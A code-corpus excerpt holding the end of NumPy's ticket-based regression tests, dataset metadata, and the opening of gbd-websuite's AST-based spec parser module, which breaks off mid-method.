assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
def test_recarray_tolist(self, level=rlevel):
"""Ticket #793, changeset r5215
"""
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
# Make sure that .item() fails graciously when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel) :
"""Ticket #825"""
for i in range(1, 9) :
msg = 'unicode offset: %d chars'%i
t = np.dtype([('a', 'S%d'%i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
"""Ticket 794."""
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
"""Ticket #674"""
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
"""Ticket #816"""
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
"""Ticket #840 - order should be an invalid keyword."""
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
"""Ticket #955"""
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
"""No ticket"""
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tostring())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tostring())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
"""Ticket #950"""
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
"""Regression test for #1061."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
"""Regression test for #1062."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
a = np.arange(sz)
self.assertTrue(np.size == sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
"""Ticket #1058"""
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
"""Ticket #1078: segfaults when creating an array with a sequence of 0d
arrays."""
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
"""Ticket #1081: weird array with strange input..."""
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
"""Ticket #1080."""
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
"""Ticket #1106."""
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
"""Ticket #1217, don't segfault."""
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
"""Ticket #1235."""
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
"""Ticket #1240."""
a = np.array(
[ [sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]
], dtype='U')
def fail():
b = np.array(a, 'S4')
self.assertRaises(UnicodeEncodeError, fail)
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
"""Ticket #1198 and #1267"""
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
r = repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
a3 = np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
a4 = copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
"""Ticket #1267"""
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
"""Ticket #1267"""
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
"""Ticket #1259 and gh-441"""
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tostring(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tostring(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
"""Ticket #1299"""
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
"""Ticket #1299 second test"""
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
"""Ticket #1254"""
def func():
x = np.dtype([(('a', 'a'), 'i'), ('b', 'i')])
self.assertRaises(ValueError, func)
def test_signed_integer_division_overflow(self):
"""Ticket #1317."""
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_numeric_handleError(self):
"""Ticket #1405"""
from numpy import numarray
# Just make sure this doesn't throw an exception
numarray.handleError(0, "")
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError as e:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tostring())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
"""Ticket #2218"""
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
rep = repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
assert_equal(np.dtype('S10').itemsize, 10)
A = np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
# This was throwing an exception because in ctors.c,
# discover_itemsize was calling PyObject_Length without checking
# the return code. This failed to get the length of the number 2,
# and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
"""Similar to GitHub issue #387"""
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
"""GitHub issue #387"""
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# This was causing a to become like the above
a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield directly manipulates the raw array data,
# so is invalid for object arrays.
x = np.array([1, 2, 3], dtype=object)
assert_raises(RuntimeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
"""Ticket #1756 """
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d"%i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
r=np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
"""Check that alignment flag is updated on stride setting"""
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
y = np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
res = np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tostring('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
if __name__ == "__main__":
run_module_suite()
| 35.894241
| 92
| 0.544313
|
3803559bbc0dd9666aba6a4127cfc243449e0567
| 18,826
|
py
|
Python
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 3
|
2020-07-24T10:10:18.000Z
|
2022-03-16T10:22:04.000Z
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 28
|
2020-03-03T17:35:58.000Z
|
2021-07-12T12:05:47.000Z
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 1
|
2021-02-22T14:32:10.000Z
|
2021-02-22T14:32:10.000Z
|
"""Parse py source files and create a list of units of interest"""
import ast
from typing import Dict, List, cast
from . import base
def parse(state: base.ParserState, meta):
for b in base.BUILTINS:
state.types[b] = base.TAtom(name=b)
state.types['TUncheckedEnum'] = base.TAtom(name='str')
for chunk in meta.chunks:
for path in chunk.paths['python']:
parser = None
try:
mod_name = _module_name(chunk, path)
text = read_file(path)
parser = _Parser(state, mod_name, path, text, meta)
parser.run()
except Exception as e:
lineno = '?'
if parser and parser.context:
lineno = parser.context[-1].lineno
msg = repr(e)
if hasattr(e, 'args'):
msg = str(e.args[0])
raise base.Error(f'{msg} in {path}:{lineno}')
##
def read_file(path):
with open(path, 'rt', encoding='utf8') as fp:
return fp.read().strip()
def write_file(path, text):
with open(path, 'wt', encoding='utf8') as fp:
fp.write(text)
##
DOT = '.'
class _Parser:
buf: str
lines: List[str]
module_node: ast.Module
module_name: str
docs: Dict[int, str]
imports: Dict[str, str]
def __init__(self, state, module_name: str, path: str, text: str, meta):
self.state: base.ParserState = state
self.module_name = module_name
self.module_path = path
self.text = text
self.lines = [''] + self.text.splitlines()
self.is_init = path.endswith('__init__.py')
self.context: List = []
self.meta = meta
def run(self):
tree = ast.parse(self.text)
for node in ast.walk(tree):
if _cls(node) == 'Module':
self.module_node = cast(ast.Module, node)
break
else:
raise ValueError('module node not found')
self.docs = self.prepare_docs()
self.imports = self.prepare_imports()
for node in self.nodes('module', 'ClassDef'):
self.parse_class(node)
for node in self.nodes('module', 'Assign'):
self.parse_type_alias(node)
##
def prepare_docs(self):
# comments can be placed before the prop like "#: blah <nl>foo"
# or inline like "foo #: blah"
cmt = '#:'
docs = {}
for n, ln in enumerate(self.lines):
ln = ln.strip()
if ln.startswith(cmt):
docs[n + 1] = ln.split(cmt)[1].strip()
elif cmt in ln:
docs[n] = ln.split(cmt)[1].strip()
return docs
def prepare_imports(self):
# map import names to module names
imp = {}
# "import a.b.c as foo" => {foo: a.b.c}
for node in self.nodes('module', 'Import'):
for nn in node.names:
imp[nn.asname or nn.name] = nn.name
for node in self.nodes('module', 'ImportFrom'):
# "from a.b.c import foo" => {foo: a.b.c.foo}
if node.level == 0:
for nn in node.names:
imp[nn.asname or nn.name] = node.module + DOT + nn.name
continue
# "from . import foo" => {foo: "<mod-name>.{
# "from .. import foo" => "<mod-name-before-dot>.foo"
# "from ..abc import foo" => "<mod-name-before-dot>.abc.foo"
m = self.module_name.split(DOT)
level = node.level - self.is_init
if level:
m = m[:-level]
m = DOT.join(m)
if node.module:
m += DOT + node.module
for nn in node.names:
imp[nn.asname or nn.name] = m + DOT + nn.name
# create alias specs for imported types
for alias, target in imp.items():
if _is_type_name(alias):
self.state.aliases[self.module_name + DOT + alias] = target
return imp
##
def parse_type_alias(self, node):
"""Parse a type alias TypeA = TypeB"""
name_node = node.targets[0]
if len(node.targets) > 1 or _cls(name_node) != 'Name' or not _is_type_name(name_node.id):
return
# we only accept aliases that have documentation strings '#: ...'
doc = self.doc_for(node)
if not doc:
return
target_type = self.type_from_node(node.value)
# mypy doesn't accept aliases to special forms,
# so we cannot use Variant = Union
# instead, if the type is Union, look in the comment string for 'Variant'
if isinstance(target_type, base.TUnion) and 'Variant' in doc:
target_type = base.TVariantStub(items=target_type.items, pos=self.pos)
self.add(target_type)
self.add(base.TAlias(
doc=doc,
ident=name_node.id,
name=self.qname(name_node),
pos=self.pos,
target_t=target_type.name,
))
def parse_class(self, node):
if not _is_type_name(node.name):
return
supers = [self.qname(b) for b in node.bases]
if supers and (supers[0] == 'Enum' or supers[0].endswith('.Enum')):
return self.parse_enum(node)
spec = base.TRecord(
doc=_docstring(node),
ident=node.name,
name=self.qname(node),
pos=self.pos,
ext_category='',
ext_kind='',
ext_type='',
supers=[self.type_from_name(s).name for s in supers],
)
d = self.class_decorator(node)
if d:
spec.ext_category = d.category
spec.ext_kind = d.kind
spec.ext_type = d.type
self.add(spec)
for nn in self.nodes(node.body, 'Assign'):
self.parse_property(spec, nn, annotated=False)
for nn in self.nodes(node.body, 'AnnAssign'):
self.parse_property(spec, nn, annotated=True)
for nn in self.nodes(node.body, 'FunctionDef'):
d = self.function_decorator(nn)
